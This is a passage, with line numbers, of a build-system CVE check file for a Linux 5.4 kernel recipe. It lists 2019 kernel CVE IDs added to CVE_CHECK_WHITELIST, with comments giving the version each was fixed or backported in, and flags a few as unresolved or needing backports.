3597# fixed-version: Fixed after version 5.1rc5
3598CVE_CHECK_WHITELIST += "CVE-2019-11487"
3599
3600# fixed-version: Fixed after version 5.1rc6
3601CVE_CHECK_WHITELIST += "CVE-2019-11599"
3602
3603# fixed-version: Fixed after version 5.1
3604CVE_CHECK_WHITELIST += "CVE-2019-11683"
3605
3606# fixed-version: Fixed after version 5.1rc1
3607CVE_CHECK_WHITELIST += "CVE-2019-11810"
3608
3609# fixed-version: Fixed after version 5.1rc1
3610CVE_CHECK_WHITELIST += "CVE-2019-11811"
3611
3612# fixed-version: Fixed after version 5.1rc4
3613CVE_CHECK_WHITELIST += "CVE-2019-11815"
3614
3615# fixed-version: Fixed after version 5.2rc1
3616CVE_CHECK_WHITELIST += "CVE-2019-11833"
3617
3618# fixed-version: Fixed after version 5.2rc1
3619CVE_CHECK_WHITELIST += "CVE-2019-11884"
3620
3621# fixed-version: Fixed after version 5.2rc3
3622CVE_CHECK_WHITELIST += "CVE-2019-12378"
3623
3624# fixed-version: Fixed after version 5.3rc1
3625CVE_CHECK_WHITELIST += "CVE-2019-12379"
3626
3627# fixed-version: Fixed after version 5.2rc3
3628CVE_CHECK_WHITELIST += "CVE-2019-12380"
3629
3630# fixed-version: Fixed after version 5.2rc3
3631CVE_CHECK_WHITELIST += "CVE-2019-12381"
3632
3633# fixed-version: Fixed after version 5.3rc1
3634CVE_CHECK_WHITELIST += "CVE-2019-12382"
3635
3636# fixed-version: Fixed after version 5.3rc1
3637CVE_CHECK_WHITELIST += "CVE-2019-12454"
3638
3639# fixed-version: Fixed after version 5.3rc1
3640CVE_CHECK_WHITELIST += "CVE-2019-12455"
3641
3642# CVE-2019-12456 has no known resolution
3643
3644# fixed-version: Fixed after version 5.3rc1
3645CVE_CHECK_WHITELIST += "CVE-2019-12614"
3646
3647# fixed-version: Fixed after version 5.2rc4
3648CVE_CHECK_WHITELIST += "CVE-2019-12615"
3649
3650# fixed-version: Fixed after version 5.2rc7
3651CVE_CHECK_WHITELIST += "CVE-2019-12817"
3652
3653# fixed-version: Fixed after version 5.0
3654CVE_CHECK_WHITELIST += "CVE-2019-12818"
3655
3656# fixed-version: Fixed after version 5.0rc8
3657CVE_CHECK_WHITELIST += "CVE-2019-12819"
3658
3659# fixed-version: Fixed after version 4.18rc1
3660CVE_CHECK_WHITELIST += "CVE-2019-12881"
3661
3662# fixed-version: Fixed after version 5.2rc6
3663CVE_CHECK_WHITELIST += "CVE-2019-12984"
3664
3665# fixed-version: Fixed after version 5.2rc4
3666CVE_CHECK_WHITELIST += "CVE-2019-13233"
3667
3668# fixed-version: Fixed after version 5.2
3669CVE_CHECK_WHITELIST += "CVE-2019-13272"
3670
3671# fixed-version: Fixed after version 5.3rc1
3672CVE_CHECK_WHITELIST += "CVE-2019-13631"
3673
3674# fixed-version: Fixed after version 5.3rc2
3675CVE_CHECK_WHITELIST += "CVE-2019-13648"
3676
3677# fixed-version: Fixed after version 5.3rc1
3678CVE_CHECK_WHITELIST += "CVE-2019-14283"
3679
3680# fixed-version: Fixed after version 5.3rc1
3681CVE_CHECK_WHITELIST += "CVE-2019-14284"
3682
3683# cpe-stable-backport: Backported in 5.4.12
3684CVE_CHECK_WHITELIST += "CVE-2019-14615"
3685
3686# fixed-version: Fixed after version 4.17rc1
3687CVE_CHECK_WHITELIST += "CVE-2019-14763"
3688
3689# fixed-version: Fixed after version 5.3
3690CVE_CHECK_WHITELIST += "CVE-2019-14814"
3691
3692# fixed-version: Fixed after version 5.3
3693CVE_CHECK_WHITELIST += "CVE-2019-14815"
3694
3695# fixed-version: Fixed after version 5.3
3696CVE_CHECK_WHITELIST += "CVE-2019-14816"
3697
3698# fixed-version: Fixed after version 5.4rc1
3699CVE_CHECK_WHITELIST += "CVE-2019-14821"
3700
3701# fixed-version: Fixed after version 5.3
3702CVE_CHECK_WHITELIST += "CVE-2019-14835"
3703
3704# cpe-stable-backport: Backported in 5.4.12
3705CVE_CHECK_WHITELIST += "CVE-2019-14895"
3706
3707# cpe-stable-backport: Backported in 5.4.16
3708CVE_CHECK_WHITELIST += "CVE-2019-14896"
3709
3710# cpe-stable-backport: Backported in 5.4.16
3711CVE_CHECK_WHITELIST += "CVE-2019-14897"
3712
3713# CVE-2019-14898 has no known resolution
3714
3715# cpe-stable-backport: Backported in 5.4.11
3716CVE_CHECK_WHITELIST += "CVE-2019-14901"
3717
3718# fixed-version: Fixed after version 5.3rc8
3719CVE_CHECK_WHITELIST += "CVE-2019-15030"
3720
3721# fixed-version: Fixed after version 5.3rc8
3722CVE_CHECK_WHITELIST += "CVE-2019-15031"
3723
3724# fixed-version: Fixed after version 5.2rc2
3725CVE_CHECK_WHITELIST += "CVE-2019-15090"
3726
3727# fixed-version: Fixed after version 5.4rc1
3728CVE_CHECK_WHITELIST += "CVE-2019-15098"
3729
3730# cpe-stable-backport: Backported in 5.4rc1
3731CVE_CHECK_WHITELIST += "CVE-2019-15099"
3732
3733# fixed-version: Fixed after version 5.3rc5
3734CVE_CHECK_WHITELIST += "CVE-2019-15117"
3735
3736# fixed-version: Fixed after version 5.3rc5
3737CVE_CHECK_WHITELIST += "CVE-2019-15118"
3738
3739# fixed-version: Fixed after version 5.3rc1
3740CVE_CHECK_WHITELIST += "CVE-2019-15211"
3741
3742# fixed-version: Fixed after version 5.2rc3
3743CVE_CHECK_WHITELIST += "CVE-2019-15212"
3744
3745# fixed-version: Fixed after version 5.3rc1
3746CVE_CHECK_WHITELIST += "CVE-2019-15213"
3747
3748# fixed-version: Fixed after version 5.1rc6
3749CVE_CHECK_WHITELIST += "CVE-2019-15214"
3750
3751# fixed-version: Fixed after version 5.3rc1
3752CVE_CHECK_WHITELIST += "CVE-2019-15215"
3753
3754# fixed-version: Fixed after version 5.1
3755CVE_CHECK_WHITELIST += "CVE-2019-15216"
3756
3757# fixed-version: Fixed after version 5.3rc1
3758CVE_CHECK_WHITELIST += "CVE-2019-15217"
3759
3760# fixed-version: Fixed after version 5.2rc3
3761CVE_CHECK_WHITELIST += "CVE-2019-15218"
3762
3763# fixed-version: Fixed after version 5.2rc3
3764CVE_CHECK_WHITELIST += "CVE-2019-15219"
3765
3766# fixed-version: Fixed after version 5.3rc1
3767CVE_CHECK_WHITELIST += "CVE-2019-15220"
3768
3769# fixed-version: Fixed after version 5.2
3770CVE_CHECK_WHITELIST += "CVE-2019-15221"
3771
3772# fixed-version: Fixed after version 5.3rc3
3773CVE_CHECK_WHITELIST += "CVE-2019-15222"
3774
3775# fixed-version: Fixed after version 5.2rc3
3776CVE_CHECK_WHITELIST += "CVE-2019-15223"
3777
3778# CVE-2019-15239 has no known resolution
3779
3780# CVE-2019-15290 has no known resolution
3781
3782# cpe-stable-backport: Backported in 5.4.1
3783CVE_CHECK_WHITELIST += "CVE-2019-15291"
3784
3785# fixed-version: Fixed after version 5.1rc1
3786CVE_CHECK_WHITELIST += "CVE-2019-15292"
3787
3788# fixed-version: Fixed after version 5.3
3789CVE_CHECK_WHITELIST += "CVE-2019-15504"
3790
3791# fixed-version: Fixed after version 5.4rc1
3792CVE_CHECK_WHITELIST += "CVE-2019-15505"
3793
3794# fixed-version: Fixed after version 5.3rc6
3795CVE_CHECK_WHITELIST += "CVE-2019-15538"
3796
3797# fixed-version: Fixed after version 5.1
3798CVE_CHECK_WHITELIST += "CVE-2019-15666"
3799
3800# CVE-2019-15791 has no known resolution
3801
3802# CVE-2019-15792 has no known resolution
3803
3804# CVE-2019-15793 has no known resolution
3805
3806# CVE-2019-15794 needs backporting (fixed from 5.12)
3807
3808# fixed-version: Fixed after version 5.2rc3
3809CVE_CHECK_WHITELIST += "CVE-2019-15807"
3810
3811# CVE-2019-15902 has no known resolution
3812
3813# fixed-version: Fixed after version 5.1rc1
3814CVE_CHECK_WHITELIST += "CVE-2019-15916"
3815
3816# fixed-version: Fixed after version 5.1rc1
3817CVE_CHECK_WHITELIST += "CVE-2019-15917"
3818
3819# fixed-version: Fixed after version 5.1rc6
3820CVE_CHECK_WHITELIST += "CVE-2019-15918"
3821
3822# fixed-version: Fixed after version 5.1rc6
3823CVE_CHECK_WHITELIST += "CVE-2019-15919"
3824
3825# fixed-version: Fixed after version 5.1rc6
3826CVE_CHECK_WHITELIST += "CVE-2019-15920"
3827
3828# fixed-version: Fixed after version 5.1rc3
3829CVE_CHECK_WHITELIST += "CVE-2019-15921"
3830
3831# fixed-version: Fixed after version 5.1rc4
3832CVE_CHECK_WHITELIST += "CVE-2019-15922"
3833
3834# fixed-version: Fixed after version 5.1rc4
3835CVE_CHECK_WHITELIST += "CVE-2019-15923"
3836
3837# fixed-version: Fixed after version 5.1rc4
3838CVE_CHECK_WHITELIST += "CVE-2019-15924"
3839
3840# fixed-version: Fixed after version 5.3rc1
3841CVE_CHECK_WHITELIST += "CVE-2019-15925"
3842
3843# fixed-version: Fixed after version 5.3rc1
3844CVE_CHECK_WHITELIST += "CVE-2019-15926"
3845
3846# fixed-version: Fixed after version 5.0rc2
3847CVE_CHECK_WHITELIST += "CVE-2019-15927"
3848
3849# CVE-2019-16089 has no known resolution
3850
3851# cpe-stable-backport: Backported in 5.4.7
3852CVE_CHECK_WHITELIST += "CVE-2019-16229"
3853
3854# cpe-stable-backport: Backported in 5.4.7
3855CVE_CHECK_WHITELIST += "CVE-2019-16230"
3856
3857# fixed-version: Fixed after version 5.4rc6
3858CVE_CHECK_WHITELIST += "CVE-2019-16231"
3859
3860# cpe-stable-backport: Backported in 5.4.7
3861CVE_CHECK_WHITELIST += "CVE-2019-16232"
3862
3863# fixed-version: Fixed after version 5.4rc5
3864CVE_CHECK_WHITELIST += "CVE-2019-16233"
3865
3866# fixed-version: Fixed after version 5.4rc4
3867CVE_CHECK_WHITELIST += "CVE-2019-16234"
3868
3869# fixed-version: Fixed after version 5.1rc1
3870CVE_CHECK_WHITELIST += "CVE-2019-16413"
3871
3872# fixed-version: Fixed after version 5.3rc7
3873CVE_CHECK_WHITELIST += "CVE-2019-16714"
3874
3875# fixed-version: Fixed after version 5.4rc2
3876CVE_CHECK_WHITELIST += "CVE-2019-16746"
3877
3878# fixed-version: Fixed after version 4.17rc1
3879CVE_CHECK_WHITELIST += "CVE-2019-16921"
3880
3881# fixed-version: Fixed after version 5.0
3882CVE_CHECK_WHITELIST += "CVE-2019-16994"
3883
3884# fixed-version: Fixed after version 5.1rc1
3885CVE_CHECK_WHITELIST += "CVE-2019-16995"
3886
3887# fixed-version: Fixed after version 5.4rc1
3888CVE_CHECK_WHITELIST += "CVE-2019-17052"
3889
3890# fixed-version: Fixed after version 5.4rc1
3891CVE_CHECK_WHITELIST += "CVE-2019-17053"
3892
3893# fixed-version: Fixed after version 5.4rc1
3894CVE_CHECK_WHITELIST += "CVE-2019-17054"
3895
3896# fixed-version: Fixed after version 5.4rc1
3897CVE_CHECK_WHITELIST += "CVE-2019-17055"
3898
3899# fixed-version: Fixed after version 5.4rc1
3900CVE_CHECK_WHITELIST += "CVE-2019-17056"
3901
3902# fixed-version: Fixed after version 5.4rc3
3903CVE_CHECK_WHITELIST += "CVE-2019-17075"
3904
3905# fixed-version: Fixed after version 5.4rc4
3906CVE_CHECK_WHITELIST += "CVE-2019-17133"
3907
3908# fixed-version: Fixed after version 5.3rc1
3909CVE_CHECK_WHITELIST += "CVE-2019-17351"
3910
3911# fixed-version: Fixed after version 5.4rc6
3912CVE_CHECK_WHITELIST += "CVE-2019-17666"
3913
3914# fixed-version: Fixed after version 5.4rc1
3915CVE_CHECK_WHITELIST += "CVE-2019-18198"
3916
3917# fixed-version: Fixed after version 5.4rc6
3918CVE_CHECK_WHITELIST += "CVE-2019-18282"
3919
3920# cpe-stable-backport: Backported in 5.4.1
3921CVE_CHECK_WHITELIST += "CVE-2019-18660"
3922
3923# fixed-version: Fixed after version 4.17rc5
3924CVE_CHECK_WHITELIST += "CVE-2019-18675"
3925
3926# CVE-2019-18680 has no known resolution
3927
3928# cpe-stable-backport: Backported in 5.4.1
3929CVE_CHECK_WHITELIST += "CVE-2019-18683"
3930
3931# cpe-stable-backport: Backported in 5.4.7
3932CVE_CHECK_WHITELIST += "CVE-2019-18786"
3933
3934# fixed-version: Fixed after version 5.1rc7
3935CVE_CHECK_WHITELIST += "CVE-2019-18805"
3936
3937# fixed-version: Fixed after version 5.4rc2
3938CVE_CHECK_WHITELIST += "CVE-2019-18806"
3939
3940# fixed-version: Fixed after version 5.4rc2
3941CVE_CHECK_WHITELIST += "CVE-2019-18807"
3942
3943# cpe-stable-backport: Backported in 5.4.56
3944CVE_CHECK_WHITELIST += "CVE-2019-18808"
3945
3946# cpe-stable-backport: Backported in 5.4.9
3947CVE_CHECK_WHITELIST += "CVE-2019-18809"
3948
3949# fixed-version: Fixed after version 5.4rc2
3950CVE_CHECK_WHITELIST += "CVE-2019-18810"
3951
3952# fixed-version: Fixed after version 5.4rc7
3953CVE_CHECK_WHITELIST += "CVE-2019-18811"
3954
3955# fixed-version: Fixed after version 5.4rc7
3956CVE_CHECK_WHITELIST += "CVE-2019-18812"
3957
3958# fixed-version: Fixed after version 5.4rc6
3959CVE_CHECK_WHITELIST += "CVE-2019-18813"
3960
3961# cpe-stable-backport: Backported in 5.4.43
3962CVE_CHECK_WHITELIST += "CVE-2019-18814"
3963
3964# fixed-version: Fixed after version 5.1rc1
3965CVE_CHECK_WHITELIST += "CVE-2019-18885"
3966
3967# fixed-version: Fixed after version 5.4rc1
3968CVE_CHECK_WHITELIST += "CVE-2019-19036"
3969
3970# cpe-stable-backport: Backported in 5.4.7
3971CVE_CHECK_WHITELIST += "CVE-2019-19037"
3972
3973# cpe-stable-backport: Backported in 5.4.33
3974CVE_CHECK_WHITELIST += "CVE-2019-19039"
3975
3976# cpe-stable-backport: Backported in 5.4.14
3977CVE_CHECK_WHITELIST += "CVE-2019-19043"
3978
3979# fixed-version: Fixed after version 5.4rc6
3980CVE_CHECK_WHITELIST += "CVE-2019-19044"
3981
3982# fixed-version: Fixed after version 5.4rc6
3983CVE_CHECK_WHITELIST += "CVE-2019-19045"
3984
3985# cpe-stable-backport: Backported in 5.4.15
3986CVE_CHECK_WHITELIST += "CVE-2019-19046"
3987
3988# fixed-version: Fixed after version 5.4rc6
3989CVE_CHECK_WHITELIST += "CVE-2019-19047"
3990
3991# fixed-version: Fixed after version 5.4rc3
3992CVE_CHECK_WHITELIST += "CVE-2019-19048"
3993
3994# fixed-version: Fixed after version 5.4rc5
3995CVE_CHECK_WHITELIST += "CVE-2019-19049"
3996
3997# cpe-stable-backport: Backported in 5.4.3
3998CVE_CHECK_WHITELIST += "CVE-2019-19050"
3999
4000# fixed-version: Fixed after version 5.4rc6
4001CVE_CHECK_WHITELIST += "CVE-2019-19051"
4002
4003# fixed-version: Fixed after version 5.4rc7
4004CVE_CHECK_WHITELIST += "CVE-2019-19052"
4005
4006# cpe-stable-backport: Backported in 5.4.12
4007CVE_CHECK_WHITELIST += "CVE-2019-19053"
4008
4009# cpe-stable-backport: Backported in 5.4.56
4010CVE_CHECK_WHITELIST += "CVE-2019-19054"
4011
4012# fixed-version: Fixed after version 5.4rc4
4013CVE_CHECK_WHITELIST += "CVE-2019-19055"
4014
4015# cpe-stable-backport: Backported in 5.4.12
4016CVE_CHECK_WHITELIST += "CVE-2019-19056"
4017
4018# cpe-stable-backport: Backported in 5.4.7
4019CVE_CHECK_WHITELIST += "CVE-2019-19057"
4020
4021# fixed-version: Fixed after version 5.4rc4
4022CVE_CHECK_WHITELIST += "CVE-2019-19058"
4023
4024# fixed-version: Fixed after version 5.4rc4
4025CVE_CHECK_WHITELIST += "CVE-2019-19059"
4026
4027# fixed-version: Fixed after version 5.4rc3
4028CVE_CHECK_WHITELIST += "CVE-2019-19060"
4029
4030# fixed-version: Fixed after version 5.4rc3
4031CVE_CHECK_WHITELIST += "CVE-2019-19061"
4032
4033# cpe-stable-backport: Backported in 5.4.3
4034CVE_CHECK_WHITELIST += "CVE-2019-19062"
4035
4036# cpe-stable-backport: Backported in 5.4.7
4037CVE_CHECK_WHITELIST += "CVE-2019-19063"
4038
4039# cpe-stable-backport: Backported in 5.4.13
4040CVE_CHECK_WHITELIST += "CVE-2019-19064"
4041
4042# fixed-version: Fixed after version 5.4rc3
4043CVE_CHECK_WHITELIST += "CVE-2019-19065"
4044
4045# cpe-stable-backport: Backported in 5.4.12
4046CVE_CHECK_WHITELIST += "CVE-2019-19066"
4047
4048# fixed-version: Fixed after version 5.4rc2
4049CVE_CHECK_WHITELIST += "CVE-2019-19067"
4050
4051# cpe-stable-backport: Backported in 5.4.12
4052CVE_CHECK_WHITELIST += "CVE-2019-19068"
4053
4054# fixed-version: Fixed after version 5.4rc3
4055CVE_CHECK_WHITELIST += "CVE-2019-19069"
4056
4057# cpe-stable-backport: Backported in 5.4.7
4058CVE_CHECK_WHITELIST += "CVE-2019-19070"
4059
4060# cpe-stable-backport: Backported in 5.4.3
4061CVE_CHECK_WHITELIST += "CVE-2019-19071"
4062
4063# fixed-version: Fixed after version 5.4rc1
4064CVE_CHECK_WHITELIST += "CVE-2019-19072"
4065
4066# fixed-version: Fixed after version 5.4rc1
4067CVE_CHECK_WHITELIST += "CVE-2019-19073"
4068
4069# fixed-version: Fixed after version 5.4rc1
4070CVE_CHECK_WHITELIST += "CVE-2019-19074"
4071
4072# fixed-version: Fixed after version 5.4rc2
4073CVE_CHECK_WHITELIST += "CVE-2019-19075"
4074
4075# fixed-version: Fixed after version 5.4rc1
4076CVE_CHECK_WHITELIST += "CVE-2019-19076"
4077
4078# fixed-version: Fixed after version 5.4rc1
4079CVE_CHECK_WHITELIST += "CVE-2019-19077"
4080
4081# cpe-stable-backport: Backported in 5.4.12
4082CVE_CHECK_WHITELIST += "CVE-2019-19078"
4083
4084# fixed-version: Fixed after version 5.3
4085CVE_CHECK_WHITELIST += "CVE-2019-19079"
4086
4087# fixed-version: Fixed after version 5.4rc1
4088CVE_CHECK_WHITELIST += "CVE-2019-19080"
4089
4090# fixed-version: Fixed after version 5.4rc1
4091CVE_CHECK_WHITELIST += "CVE-2019-19081"
4092
4093# fixed-version: Fixed after version 5.4rc1
4094CVE_CHECK_WHITELIST += "CVE-2019-19082"
4095
4096# fixed-version: Fixed after version 5.4rc2
4097CVE_CHECK_WHITELIST += "CVE-2019-19083"
4098
4099# fixed-version: Fixed after version 5.1rc3
4100CVE_CHECK_WHITELIST += "CVE-2019-19227"
4101
4102# fixed-version: only affects 5.5rc1 onwards
4103CVE_CHECK_WHITELIST += "CVE-2019-19241"
4104
4105# cpe-stable-backport: Backported in 5.4.3
4106CVE_CHECK_WHITELIST += "CVE-2019-19252"
4107
4108# fixed-version: Fixed after version 5.4rc1
4109CVE_CHECK_WHITELIST += "CVE-2019-19318"
4110
4111# fixed-version: Fixed after version 5.2rc1
4112CVE_CHECK_WHITELIST += "CVE-2019-19319"
4113
4114# cpe-stable-backport: Backported in 5.4.3
4115CVE_CHECK_WHITELIST += "CVE-2019-19332"
4116
4117# cpe-stable-backport: Backported in 5.4.3
4118CVE_CHECK_WHITELIST += "CVE-2019-19338"
4119
4120# cpe-stable-backport: Backported in 5.4.33
4121CVE_CHECK_WHITELIST += "CVE-2019-19377"
4122
4123# CVE-2019-19378 has no known resolution
4124
4125# cpe-stable-backport: Backported in 5.4.4
4126CVE_CHECK_WHITELIST += "CVE-2019-19447"
4127
4128# cpe-stable-backport: Backported in 5.4.60
4129CVE_CHECK_WHITELIST += "CVE-2019-19448"
4130
4131# CVE-2019-19449 needs backporting (fixed from 5.10rc1)
4132
4133# cpe-stable-backport: Backported in 5.4.45
4134CVE_CHECK_WHITELIST += "CVE-2019-19462"
4135
4136# fixed-version: Fixed after version 5.4rc3
4137CVE_CHECK_WHITELIST += "CVE-2019-19523"
4138
4139# fixed-version: Fixed after version 5.4rc8
4140CVE_CHECK_WHITELIST += "CVE-2019-19524"
4141
4142# fixed-version: Fixed after version 5.4rc2
4143CVE_CHECK_WHITELIST += "CVE-2019-19525"
4144
4145# fixed-version: Fixed after version 5.4rc4
4146CVE_CHECK_WHITELIST += "CVE-2019-19526"
4147
4148# fixed-version: Fixed after version 5.3rc4
4149CVE_CHECK_WHITELIST += "CVE-2019-19527"
4150
4151# fixed-version: Fixed after version 5.4rc3
4152CVE_CHECK_WHITELIST += "CVE-2019-19528"
4153
4154# fixed-version: Fixed after version 5.4rc7
4155CVE_CHECK_WHITELIST += "CVE-2019-19529"
4156
4157# fixed-version: Fixed after version 5.3rc5
4158CVE_CHECK_WHITELIST += "CVE-2019-19530"
4159
4160# fixed-version: Fixed after version 5.3rc4
4161CVE_CHECK_WHITELIST += "CVE-2019-19531"
4162
4163# fixed-version: Fixed after version 5.4rc6
4164CVE_CHECK_WHITELIST += "CVE-2019-19532"
4165
4166# fixed-version: Fixed after version 5.4rc1
4167CVE_CHECK_WHITELIST += "CVE-2019-19533"
4168
4169# fixed-version: Fixed after version 5.4rc7
4170CVE_CHECK_WHITELIST += "CVE-2019-19534"
4171
4172# fixed-version: Fixed after version 5.3rc4
4173CVE_CHECK_WHITELIST += "CVE-2019-19535"
4174
4175# fixed-version: Fixed after version 5.3rc4
4176CVE_CHECK_WHITELIST += "CVE-2019-19536"
4177
4178# fixed-version: Fixed after version 5.3rc5
4179CVE_CHECK_WHITELIST += "CVE-2019-19537"
4180
4181# fixed-version: Fixed after version 5.2rc1
4182CVE_CHECK_WHITELIST += "CVE-2019-19543"
4183
4184# cpe-stable-backport: Backported in 5.4.2
4185CVE_CHECK_WHITELIST += "CVE-2019-19602"
4186
4187# cpe-stable-backport: Backported in 5.4.2
4188CVE_CHECK_WHITELIST += "CVE-2019-19767"
4189
4190# cpe-stable-backport: Backported in 5.4.24
4191CVE_CHECK_WHITELIST += "CVE-2019-19768"
4192
4193# cpe-stable-backport: Backported in 5.4.28
4194CVE_CHECK_WHITELIST += "CVE-2019-19769"
4195
4196# cpe-stable-backport: Backported in 5.4.59
4197CVE_CHECK_WHITELIST += "CVE-2019-19770"
4198
4199# fixed-version: Fixed after version 5.4rc7
4200CVE_CHECK_WHITELIST += "CVE-2019-19807"
4201
4202# fixed-version: Fixed after version 5.2rc1
4203CVE_CHECK_WHITELIST += "CVE-2019-19813"
4204
4205# CVE-2019-19814 has no known resolution
4206
4207# fixed-version: Fixed after version 5.3rc1
4208CVE_CHECK_WHITELIST += "CVE-2019-19815"
4209
4210# fixed-version: Fixed after version 5.2rc1
4211CVE_CHECK_WHITELIST += "CVE-2019-19816"
4212
4213# fixed-version: Fixed after version 5.4rc1
4214CVE_CHECK_WHITELIST += "CVE-2019-19922"
4215
4216# fixed-version: Fixed after version 5.1rc6
4217CVE_CHECK_WHITELIST += "CVE-2019-19927"
4218
4219# cpe-stable-backport: Backported in 5.4.7
4220CVE_CHECK_WHITELIST += "CVE-2019-19947"
4221
4222# cpe-stable-backport: Backported in 5.4.9
4223CVE_CHECK_WHITELIST += "CVE-2019-19965"
4224
4225# fixed-version: Fixed after version 5.2rc1
4226CVE_CHECK_WHITELIST += "CVE-2019-19966"
4227
4228# fixed-version: Fixed after version 5.1rc3
4229CVE_CHECK_WHITELIST += "CVE-2019-1999"
4230
4231# fixed-version: Fixed after version 5.1rc3
4232CVE_CHECK_WHITELIST += "CVE-2019-20054"
4233
4234# fixed-version: Fixed after version 5.2rc1
4235CVE_CHECK_WHITELIST += "CVE-2019-20095"
4236
4237# fixed-version: Fixed after version 5.1rc4
4238CVE_CHECK_WHITELIST += "CVE-2019-20096"
4239
4240# fixed-version: Fixed after version 4.16rc1
4241CVE_CHECK_WHITELIST += "CVE-2019-2024"
4242
4243# fixed-version: Fixed after version 4.20rc5
4244CVE_CHECK_WHITELIST += "CVE-2019-2025"
4245
4246# fixed-version: Fixed after version 5.4rc1
4247CVE_CHECK_WHITELIST += "CVE-2019-20422"
4248
4249# fixed-version: Fixed after version 4.8rc1
4250CVE_CHECK_WHITELIST += "CVE-2019-2054"
4251
4252# cpe-stable-backport: Backported in 5.4.12
4253CVE_CHECK_WHITELIST += "CVE-2019-20636"
4254
4255# CVE-2019-20794 has no known resolution
4256
4257# fixed-version: Fixed after version 5.2rc1
4258CVE_CHECK_WHITELIST += "CVE-2019-20806"
4259
4260# cpe-stable-backport: Backported in 5.4.48
4261CVE_CHECK_WHITELIST += "CVE-2019-20810"
4262
4263# fixed-version: Fixed after version 5.1rc3
4264CVE_CHECK_WHITELIST += "CVE-2019-20811"
4265
4266# cpe-stable-backport: Backported in 5.4.7
4267CVE_CHECK_WHITELIST += "CVE-2019-20812"
4268
4269# fixed-version: Fixed after version 5.4rc1
4270CVE_CHECK_WHITELIST += "CVE-2019-20908"
4271
4272# fixed-version: Fixed after version 5.3rc2
4273CVE_CHECK_WHITELIST += "CVE-2019-20934"
4274
4275# fixed-version: Fixed after version 5.1rc1
4276CVE_CHECK_WHITELIST += "CVE-2019-2101"
4277
4278# fixed-version: Fixed after version 5.2rc1
4279CVE_CHECK_WHITELIST += "CVE-2019-2181"
4280
4281# fixed-version: Fixed after version 4.16rc3
4282CVE_CHECK_WHITELIST += "CVE-2019-2182"
4283
4284# fixed-version: Fixed after version 5.2rc6
4285CVE_CHECK_WHITELIST += "CVE-2019-2213"
4286
4287# fixed-version: Fixed after version 5.3rc2
4288CVE_CHECK_WHITELIST += "CVE-2019-2214"
4289
4290# fixed-version: Fixed after version 4.16rc1
4291CVE_CHECK_WHITELIST += "CVE-2019-2215"
4292
4293# fixed-version: Fixed after version 5.2rc4
4294CVE_CHECK_WHITELIST += "CVE-2019-25044"
4295
4296# fixed-version: Fixed after version 5.1
4297CVE_CHECK_WHITELIST += "CVE-2019-25045"
4298
4299# fixed-version: Fixed after version 5.0
4300CVE_CHECK_WHITELIST += "CVE-2019-25160"
4301
4302# cpe-stable-backport: Backported in 5.4.211
4303CVE_CHECK_WHITELIST += "CVE-2019-25162"
4304
4305# cpe-stable-backport: Backported in 5.4.19
4306CVE_CHECK_WHITELIST += "CVE-2019-3016"
4307
4308# fixed-version: Fixed after version 5.1rc1
4309CVE_CHECK_WHITELIST += "CVE-2019-3459"
4310
4311# fixed-version: Fixed after version 5.1rc1
4312CVE_CHECK_WHITELIST += "CVE-2019-3460"
4313
4314# fixed-version: Fixed after version 5.0rc3
4315CVE_CHECK_WHITELIST += "CVE-2019-3701"
4316
4317# fixed-version: Fixed after version 5.0rc6
4318CVE_CHECK_WHITELIST += "CVE-2019-3819"
4319
4320# fixed-version: Fixed after version 3.18rc1
4321CVE_CHECK_WHITELIST += "CVE-2019-3837"
4322
4323# fixed-version: Fixed after version 5.2rc6
4324CVE_CHECK_WHITELIST += "CVE-2019-3846"
4325
4326# fixed-version: Fixed after version 5.2rc1
4327CVE_CHECK_WHITELIST += "CVE-2019-3874"
4328
4329# fixed-version: Fixed after version 5.1rc4
4330CVE_CHECK_WHITELIST += "CVE-2019-3882"
4331
4332# fixed-version: Fixed after version 5.1rc4
4333CVE_CHECK_WHITELIST += "CVE-2019-3887"
4334
4335# fixed-version: Fixed after version 5.1rc6
4336CVE_CHECK_WHITELIST += "CVE-2019-3892"
4337
4338# fixed-version: Fixed after version 2.6.35rc1
4339CVE_CHECK_WHITELIST += "CVE-2019-3896"
4340
4341# fixed-version: Fixed after version 5.2rc4
4342CVE_CHECK_WHITELIST += "CVE-2019-3900"
4343
4344# fixed-version: Fixed after version 4.6rc6
4345CVE_CHECK_WHITELIST += "CVE-2019-3901"
4346
4347# fixed-version: Fixed after version 5.3
4348CVE_CHECK_WHITELIST += "CVE-2019-5108"
4349
4350# Skipping CVE-2019-5489, no affected_versions
4351
4352# fixed-version: Fixed after version 5.0rc2
4353CVE_CHECK_WHITELIST += "CVE-2019-6133"
4354
4355# fixed-version: Fixed after version 5.0rc6
4356CVE_CHECK_WHITELIST += "CVE-2019-6974"
4357
4358# fixed-version: Fixed after version 5.0rc6
4359CVE_CHECK_WHITELIST += "CVE-2019-7221"
4360
4361# fixed-version: Fixed after version 5.0rc6
4362CVE_CHECK_WHITELIST += "CVE-2019-7222"
4363
4364# fixed-version: Fixed after version 5.0rc3
4365CVE_CHECK_WHITELIST += "CVE-2019-7308"
4366
4367# fixed-version: Fixed after version 5.0rc8
4368CVE_CHECK_WHITELIST += "CVE-2019-8912"
4369
4370# fixed-version: Fixed after version 5.0rc6
4371CVE_CHECK_WHITELIST += "CVE-2019-8956"
4372
4373# fixed-version: Fixed after version 5.1rc1
4374CVE_CHECK_WHITELIST += "CVE-2019-8980"
4375
4376# fixed-version: Fixed after version 5.0rc4
4377CVE_CHECK_WHITELIST += "CVE-2019-9003"
4378
4379# fixed-version: Fixed after version 5.0rc7
4380CVE_CHECK_WHITELIST += "CVE-2019-9162"
4381
4382# fixed-version: Fixed after version 5.0
4383CVE_CHECK_WHITELIST += "CVE-2019-9213"
4384
4385# fixed-version: Fixed after version 5.0rc1
4386CVE_CHECK_WHITELIST += "CVE-2019-9245"
4387
4388# fixed-version: Fixed after version 4.15rc2
4389CVE_CHECK_WHITELIST += "CVE-2019-9444"
4390
4391# fixed-version: Fixed after version 5.1rc1
4392CVE_CHECK_WHITELIST += "CVE-2019-9445"
4393
4394# fixed-version: Fixed after version 5.2rc1
4395CVE_CHECK_WHITELIST += "CVE-2019-9453"
4396
4397# fixed-version: Fixed after version 4.15rc9
4398CVE_CHECK_WHITELIST += "CVE-2019-9454"
4399
4400# fixed-version: Fixed after version 5.0rc1
4401CVE_CHECK_WHITELIST += "CVE-2019-9455"
4402
4403# fixed-version: Fixed after version 4.16rc6
4404CVE_CHECK_WHITELIST += "CVE-2019-9456"
4405
4406# fixed-version: Fixed after version 4.13rc1
4407CVE_CHECK_WHITELIST += "CVE-2019-9457"
4408
4409# fixed-version: Fixed after version 4.19rc7
